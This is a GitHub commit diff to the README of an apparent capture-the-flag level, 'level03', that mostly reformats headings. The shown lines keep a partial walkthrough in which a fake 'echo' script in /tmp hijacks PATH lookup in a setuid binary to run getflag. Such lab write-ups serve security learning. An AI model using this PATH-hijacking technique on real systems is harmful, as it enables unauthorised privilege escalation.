Skip to content

Commit

Permalink
Update README.mdx
Browse files Browse the repository at this point in the history
  • Loading branch information
nuoxoxo authored Nov 16, 2024
1 parent 80f048c commit e685965
Showing 1 changed file with 4 additions and 3 deletions.
7 changes: 4 additions & 3 deletions level03/README.mdx
Original file line number Diff line number Diff line change
@@ -1,7 +1,8 @@
# 03

- inspect
- available actions - `file` `readelf` `strings` :❌ `ltrace`
- Inspect
-`file` `readelf` `strings`
-`ltrace`
```b
> ls -l
-rwsr-sr-x 1 flag03 level03 8627 level03
Expand Down Expand Up @@ -33,7 +34,7 @@ system("/usr/bin/env echo Exploit me" ...
getflag: /bin/getflag
```

- solution
- Solution

```b
> echo -e "#\!/bin/bash\n/bin/getflag" > /tmp/echo
Expand Down

0 comments on commit e685965

Please sign in to comment.